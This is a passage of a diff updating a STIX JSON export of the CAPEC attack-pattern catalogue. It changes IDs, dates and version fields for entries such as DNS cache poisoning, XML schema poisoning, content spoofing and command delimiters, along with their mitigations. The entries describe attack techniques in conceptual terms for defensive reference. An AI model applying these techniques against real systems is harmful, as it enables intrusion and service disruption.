"course-of-action--9f7a93ff-6bb7-45e0-bd61-602d7b7e5576", + "id": "relationship--d67f7aa5-b8c0-4d6b-a352-e2014c2ab4a4", + "source_ref": "course-of-action--563ecada-f5a4-4f5b-952d-7281408f06c8", "relationship_type": "mitigates", - "target_ref": "attack-pattern--ea46892f-7aa1-4fca-a91b-8ceb28af7c11" + "target_ref": "attack-pattern--9484743d-53ab-4f6f-81e9-cde4ac98307b" }, { "name": "DNS Cache Poisoning", "description": "A domain name server translates a domain name (such as www.example.com) into an IP address that Internet hosts use to contact Internet resources. An adversary modifies a public DNS cache to cause certain names to resolve to incorrect addresses that the adversary specifies. The result is that client applications that rely upon the targeted cache for domain name resolution will be directed not to the actual address of the specified domain name but to some other address. Adversaries can use this to herd clients to sites that install malware on the victim's computer or to masquerade as part of a Pharming attack.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", @@ -5633,93 +5679,94 @@ "\n In this example, an adversary sends request to a local DNS server to look up www.example .com. The associated IP address of www.example.com is 1.3.5.7.\n Local DNS usually caches IP addresses and do not go to remote DNS every time. Since the local record is not found, DNS server tries to connect to remote DNS for queries. However, before the remote DNS returns the right IP address 1.3.5.7, the adversary floods local DNS with crafted responses with IP address 2.4.6.8. The result is that 2.4.6.8 is stored in DNS cache. Meanwhile, 2.4.6.8 is associated with a malicious website www.maliciousexampsle.com\n When users connect to www.example.com, the local DNS will direct it to www.maliciousexample.com, this works as part of a Pharming attack.\n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--20adc6c4-85bc-4ba2-8758-be1375a646fd" + "id": "attack-pattern--bddad79c-d5bb-431e-96f2-7c5db95e1132" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-142-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Configuration: Make sure your DNS servers have been updated to the latest versions", "type": "course-of-action", - "id": "course-of-action--ff2671f9-c372-498f-a2c0-b410d4be03ba" + "id": "course-of-action--083b142c-0281-4135-bf8d-cb4a55bda94e" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--1eaf09d9-a7ed-444a-9099-5a21fe0b0d1b", - "source_ref": "course-of-action--ff2671f9-c372-498f-a2c0-b410d4be03ba", + "id": "relationship--7a5c3fcf-46fd-4fec-8a86-ab6f4e3d40f2", + "source_ref": "course-of-action--083b142c-0281-4135-bf8d-cb4a55bda94e", "relationship_type": "mitigates", - "target_ref": "attack-pattern--20adc6c4-85bc-4ba2-8758-be1375a646fd" + "target_ref": "attack-pattern--bddad79c-d5bb-431e-96f2-7c5db95e1132" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-142-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Configuration: UNIX services like rlogin, rsh/rcp, xhost, and nfs are all susceptible to wrong information being held in a cache. Care should be taken with these services so they do not rely upon DNS caches that have been exposed to the Internet.", "type": "course-of-action", - "id": "course-of-action--c8ca37f6-5421-472c-ba30-45e647534a59" + "id": "course-of-action--4fc7792e-2ac1-4852-aab4-e7894a72ad89" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--81d879e8-1c58-4b98-a38e-a2f79236f2ca", - "source_ref": "course-of-action--c8ca37f6-5421-472c-ba30-45e647534a59", + "id": "relationship--ea3cdbc2-1ee8-412f-8053-7535c1ee1e7b", + "source_ref": "course-of-action--4fc7792e-2ac1-4852-aab4-e7894a72ad89", "relationship_type": "mitigates", - "target_ref": "attack-pattern--20adc6c4-85bc-4ba2-8758-be1375a646fd" + "target_ref": "attack-pattern--bddad79c-d5bb-431e-96f2-7c5db95e1132" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-142-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Configuration: Disable client side DNS caching.", "type": "course-of-action", - "id": "course-of-action--d8a33002-cec3-4fe5-b0aa-cad5ad155b27" + "id": "course-of-action--7be03f8e-bbcc-49da-aec1-39a01323166c" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--42df3a68-b1ec-4c03-964c-7cbe389845f0", - "source_ref": "course-of-action--d8a33002-cec3-4fe5-b0aa-cad5ad155b27", + "id": "relationship--a84d6185-2db4-497a-9695-e47d54880e22", + "source_ref": "course-of-action--7be03f8e-bbcc-49da-aec1-39a01323166c", "relationship_type": "mitigates", - "target_ref": "attack-pattern--20adc6c4-85bc-4ba2-8758-be1375a646fd" + "target_ref": "attack-pattern--bddad79c-d5bb-431e-96f2-7c5db95e1132" }, { "name": "Detect Unpublicized Web Pages", "description": "An attacker searches a targeted web site for web pages that have not been publicized. Generally this involves mapping the published web site by spidering through all the published links and then attempt to access well-known debugging or logging pages, or otherwise predictable pages within the site tree. For example, if an attacker might be able to notice a pattern in the naming of documents and extrapolate this pattern to discover additional documents that have been created but are no longer externally linked. Using this, the attacker may be able to gain access to information that the targeted site did not intend to make public.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", - "modified": "2015-12-07T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "external_references": [ { "source_name": "capec", @@ -5736,18 +5783,19 @@ ], "x_capec_abstraction": "Detailed", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--5f3c64b8-444e-491e-bd6c-52842b3547c5" + "id": "attack-pattern--42ee3c77-31b2-4053-9fdd-6633fe637e02" }, { "name": "Detect Unpublicized Web Services", "description": "An attacker searches a targeted web site for web services that have not been publicized. Generally this involves mapping the published web site by spidering through all the published links and then attempt to access well-known debugging or logging services, or otherwise predictable services within the site tree. This attack can be especially dangerous since unpublished but available services may not have adequate security controls placed upon them given that an administrator may believe they are unreachable.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", - "modified": "2015-12-07T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "external_references": [ { "source_name": "capec", @@ -5764,15 +5812,16 @@ ], "x_capec_abstraction": "Detailed", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--7cbc1255-e830-449b-ac3f-e43d2c476368" + "id": "attack-pattern--7223c9f9-1b02-4cd5-ba2f-58bf87784322" }, { "name": "Checksum Spoofing", "description": "An adversary spoofs a checksum message for the purpose of making a payload appear to have a valid corresponding checksum. Checksums are used to verify message integrity. They consist of some value based on the value of the message they are protecting. Hash codes are a common checksum mechanism. Both the sender and recipient are able to compute the checksum based on the contents of the message. If the message contents change between the sender and recipient, the sender and recipient will compute different checksum values. Since the sender's checksum value is transmitted with the message, the recipient would know that a modification occurred. In checksum spoofing an adversary modifies the message body and then modifies the corresponding checksum so that the recipient's checksum calculation will match the checksum (created by the adversary) in the message. This would prevent the recipient from realizing that a change occurred.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -5799,15 +5848,16 @@ ], "x_capec_abstraction": "Detailed", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--edc5582e-55a2-4ed8-97ca-150cf00f8976" + "id": "attack-pattern--75c788ca-dc5d-443d-abeb-301ce54cd9ec" }, { "name": "XML Schema Poisoning", "description": "An adversary corrupts or modifies the content of XML schema information passed between a client and server for the purpose of undermining the security of the target. XML Schemas provide the structure and content definitions for XML documents. Schema poisoning is the ability to manipulate a schema either by replacing or modifying it to compromise the programs that process documents that use this schema. Possible attacks are denial of service attacks by modifying the schema so that it does not contain required information for subsequent processing. For example, the unaltered schema may require a @name attribute in all submitted documents. If the adversary removes this attribute from the schema then documents created using the new grammar may lack this field, which may cause the processing application to enter an unexpected state or record incomplete data. In addition, manipulation of the data types described in the schema may affect the results of calculations taken by the document reader. For example, a float field could be changed to an int field. Finally, the adversary may change the encoding defined in the schema for certain fields allowing the contents to bypass filters that scan for dangerous strings. For example, the modified schema might us a URL encoding instead of ASCII, and a filter that catches a semicolon (;) might fail to detect its URL encoding (%3B).", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -5855,90 +5905,91 @@ "\n XML Schema Poisoning Attacks can also be executed remotely if the HTTP protocol is being used to transport data. :\n John Smith 555-1234 jsmith@email.com
1 Example Lane
\n The HTTP protocol does not encrypt the traffic it transports, so all communication occurs in plaintext. This traffic can be observed and modified by the adversary during transit to alter the XML schema before it reaches the end user. The adversary can perform a Man-in-the-Middle (MITM) Attack to alter the schema in the same way as the previous example and to acheive the same results.\n " ], "x_capec_status": "Stable", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--6ed4fabd-fef9-4657-9d80-e97cd573061d" + "id": "attack-pattern--341c4200-549a-4cef-b4d7-347bf2e55baa" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-146-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: Protect the schema against unauthorized modification.", "type": "course-of-action", - "id": "course-of-action--dd1bc3a1-d48e-4216-ae49-8d9590658d0d" + "id": "course-of-action--ac658283-b4b3-4659-8c55-1356281d2e44" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--e78a4783-5522-4736-93aa-727bb6d7eff7", - "source_ref": "course-of-action--dd1bc3a1-d48e-4216-ae49-8d9590658d0d", + "id": "relationship--d2218e8a-5035-416c-9762-451d807827d9", + "source_ref": "course-of-action--ac658283-b4b3-4659-8c55-1356281d2e44", "relationship_type": "mitigates", - "target_ref": "attack-pattern--6ed4fabd-fef9-4657-9d80-e97cd573061d" + "target_ref": "attack-pattern--341c4200-549a-4cef-b4d7-347bf2e55baa" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-146-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: For applications that use a known schema, use a local copy or a known good repository instead of the schema reference supplied in the XML document. Additionally, ensure that the proper permissions are set on local files to avoid unauthorized modification.", "type": "course-of-action", - "id": "course-of-action--d902a29f-58bf-4462-a1a8-2f1f99202ce4" + "id": "course-of-action--951c7f78-c8d9-4d78-a0d2-522108019a8f" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--7fe4c3c5-dc70-4a10-972a-eabc6b25f7d8", - "source_ref": "course-of-action--d902a29f-58bf-4462-a1a8-2f1f99202ce4", + "id": "relationship--5fb0e4ef-710f-4a96-9b25-ca14dae5dadc", + "source_ref": "course-of-action--951c7f78-c8d9-4d78-a0d2-522108019a8f", "relationship_type": "mitigates", - "target_ref": "attack-pattern--6ed4fabd-fef9-4657-9d80-e97cd573061d" + "target_ref": "attack-pattern--341c4200-549a-4cef-b4d7-347bf2e55baa" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-146-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: For applications that leverage remote schemas, use the HTTPS protocol to prevent modification of traffic in transit and to avoid unauthorized modification.", "type": "course-of-action", - "id": "course-of-action--b737309c-83d2-498d-a8eb-aa1e0f918379" + "id": "course-of-action--bb535ccb-21d3-4027-a4d3-41972fe6bd8f" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--3f1b898a-9d0d-4597-a628-a140cdd98741", - "source_ref": "course-of-action--b737309c-83d2-498d-a8eb-aa1e0f918379", + "id": "relationship--9c5f4f0c-c505-4073-9be5-4b61f35fe38e", + "source_ref": "course-of-action--bb535ccb-21d3-4027-a4d3-41972fe6bd8f", "relationship_type": "mitigates", - "target_ref": "attack-pattern--6ed4fabd-fef9-4657-9d80-e97cd573061d" + "target_ref": "attack-pattern--341c4200-549a-4cef-b4d7-347bf2e55baa" }, { "name": "XML Ping of the Death", "description": "An attacker initiates a resource depletion attack where a large number of small XML messages are delivered at a sufficiently rapid rate to cause a denial of service or crash of the target. Transactions such as repetitive SOAP transactions can deplete resources faster than a simple flooding attack because of the additional resources used by the SOAP protocol and the resources necessary to process SOAP messages. The transactions used are immaterial as long as they cause resource utilization on the target. In other words, this is a normal flooding attack augmented by using messages that will require extra processing on the target.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -5981,65 +6032,66 @@ "Consider the case of attack performed against the createCustomerBillingAccount Web Service for an online store. In this case, the createCustomerBillingAccount Web Service receives a huge number of simultaneous requests, containing nonsense billing account creation information (the small XML messages). The createCustomerBillingAccount Web Services may forward the messages to other Web Services for processing. The application suffers from a high load of requests, potentially leading to a complete loss of availability the involved Web Service." ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--fae5030b-1934-4174-9a0e-aa59cbae8e93" + "id": "attack-pattern--dd79f192-635b-43ef-96d2-17548fa8c917" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-147-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: Build throttling mechanism into the resource allocation. Provide for a timeout mechanism for allocated resources whose transaction does not complete within a specified interval.", "type": "course-of-action", - "id": "course-of-action--1639bb2f-dcf2-4d87-a998-b2b1b7c017ff" + "id": "course-of-action--aebeb944-089d-4f75-825e-35491ce299d5" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--16e84977-90d3-4813-b45a-c9f58943f042", - "source_ref": "course-of-action--1639bb2f-dcf2-4d87-a998-b2b1b7c017ff", + "id": "relationship--eca6e1f0-5c98-4ae9-8052-e029952bbe26", + "source_ref": "course-of-action--aebeb944-089d-4f75-825e-35491ce299d5", "relationship_type": "mitigates", - "target_ref": "attack-pattern--fae5030b-1934-4174-9a0e-aa59cbae8e93" + "target_ref": "attack-pattern--dd79f192-635b-43ef-96d2-17548fa8c917" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-147-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: Provide for network flow control and traffic shaping to control access to the resources.", "type": "course-of-action", - "id": "course-of-action--97a16bb2-320d-4d90-83b7-f82f00adc1f5" + "id": "course-of-action--b669e453-8bfb-4dd3-bee9-992473335348" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--36d93477-88ea-4580-8bf5-ced23c0e1cea", - "source_ref": "course-of-action--97a16bb2-320d-4d90-83b7-f82f00adc1f5", + "id": "relationship--0c8969f7-76a6-4787-8881-8d87de5bd816", + "source_ref": "course-of-action--b669e453-8bfb-4dd3-bee9-992473335348", "relationship_type": "mitigates", - "target_ref": "attack-pattern--fae5030b-1934-4174-9a0e-aa59cbae8e93" + "target_ref": "attack-pattern--dd79f192-635b-43ef-96d2-17548fa8c917" }, { "name": "Content Spoofing", "description": "An adversary modifies content to make it contain something other than what the original content producer intended while keeping the apparent source of the content unchanged. The term content spoofing is most often used to describe modification of web pages hosted by a target to display the adversary's content instead of the owner's content. However, any content can be spoofed, including the content of email messages, file transfers, or the content of other network communication protocols. Content can be modified at the source (e.g. modifying the source file for a web page) or in transit (e.g. intercepting and modifying a message between the sender and recipient). Usually, the adversary will attempt to hide the fact that the content has been modified, but in some cases, such as with web site defacement, this is not necessary. Content Spoofing can lead to malware exposure, financial fraud (if the content governs financial transactions), privacy violations, and other unwanted outcomes.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", @@ -6070,18 +6122,19 @@ }, "x_capec_abstraction": "Meta", "x_capec_status": "Stable", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--1ec9e73a-35da-4287-aef7-4d14d5a46256" + "id": "attack-pattern--3deccce4-93c6-4403-b5e4-84748a2dd85d" }, { "name": "Explore for Predictable Temporary File Names", "description": "An attacker explores a target to identify the names and locations of predictable temporary files for the purpose of launching further attacks against the target. This involves analyzing naming conventions and storage locations of the temporary files created by a target application. If an attacker can predict the names of temporary files they can use this information to mount other attacks, such as information gathering and symlink attacks.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "external_references": [ { "source_name": "capec", @@ -6099,18 +6152,19 @@ ], "x_capec_abstraction": "Detailed", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--793a9950-766b-441d-b61e-80a801e760db" + "id": "attack-pattern--cb05a77d-c1ac-41b4-8df1-a4b31cb1fef8" }, { "name": "Command Delimiters", "description": "An attack of this type exploits a programs' vulnerabilities that allows an attacker's commands to be concatenated onto a legitimate command with the intent of targeting other resources such as the file system or database. The system that uses a filter or a blacklist input validation, as opposed to whitelist validation is vulnerable to an attacker who predicts delimiters (or combinations of delimiters) not present in the filter or blacklist. As with other injection attacks, the attacker uses the command delimiter payload as an entry point to tunnel through the application and activate additional attacks through SQL queries, shell commands, network scanning, and so on.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", - "modified": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "external_references": [ { "source_name": "capec", @@ -6211,115 +6265,116 @@ "\n By appending special characters, such as a semicolon or other commands that are executed by the target process, the attacker is able to execute a wide variety of malicious commands in the target process space, utilizing the target's inherited permissions, against any resource the host has access to. The possibilities are vast including injection attacks against RDBMS (SQL Injection), directory servers (LDAP Injection), XML documents (XPath and XQuery Injection), and command line shells. In many injection attacks, the results are converted back to strings and displayed to the client process such as a web browser without tripping any security alarms, so the network firewall does not log any out of the ordinary behavior.\n LDAP servers house critical identity assets such as user, profile, password, and group information that is used to authenticate and authorize users. An attacker that can query the directory at will and execute custom commands against the directory server is literally working with the keys to the kingdom in many enterprises. When user, organizational units, and other directory objects are queried by building the query string directly from user input with no validation, or other conversion, then the attacker has the ability to use any LDAP commands to query, filter, list, and crawl against the LDAP server directly in the same manner as SQL injection gives the ability to the attacker to run SQL commands on the database.\n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--b0fda5b8-6244-430f-a3df-ae981b83d4dd" + "id": "attack-pattern--0e6d2797-eedc-4782-8e0c-eb9a682d2b54" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-15-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: Perform whitelist validation against a positive specification for command length, type, and parameters.", "type": "course-of-action", - "id": "course-of-action--43752d0b-52be-4745-bc61-f8b77466b6f2" + "id": "course-of-action--39a3cf0d-a301-4aff-b32c-1ed38ed15957" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--0d80833b-353a-4cfe-8dd6-cc8a7c6cdbe0", - "source_ref": "course-of-action--43752d0b-52be-4745-bc61-f8b77466b6f2", + "id": "relationship--4624b19e-5704-4747-a1ea-1b857692f821", + "source_ref": "course-of-action--39a3cf0d-a301-4aff-b32c-1ed38ed15957", "relationship_type": "mitigates", - "target_ref": "attack-pattern--b0fda5b8-6244-430f-a3df-ae981b83d4dd" + "target_ref": "attack-pattern--0e6d2797-eedc-4782-8e0c-eb9a682d2b54" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-15-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: Limit program privileges, so if commands circumvent program input validation or filter routines then commands do not running under a privileged account", "type": "course-of-action", - "id": "course-of-action--dad5161f-ca19-4ceb-bd08-737fe6aa002e" + "id": "course-of-action--13d834cf-5ff3-49ae-9172-f9cbf8f6762f" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--60e203dc-8fd8-4cf4-8f31-c05cdf92037f", - "source_ref": "course-of-action--dad5161f-ca19-4ceb-bd08-737fe6aa002e", + "id": "relationship--7d63cc56-ed2c-4c5b-81c6-673180a95326", + "source_ref": "course-of-action--13d834cf-5ff3-49ae-9172-f9cbf8f6762f", "relationship_type": "mitigates", - "target_ref": "attack-pattern--b0fda5b8-6244-430f-a3df-ae981b83d4dd" + "target_ref": "attack-pattern--0e6d2797-eedc-4782-8e0c-eb9a682d2b54" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2014-06-23T00:00:00.000Z", + 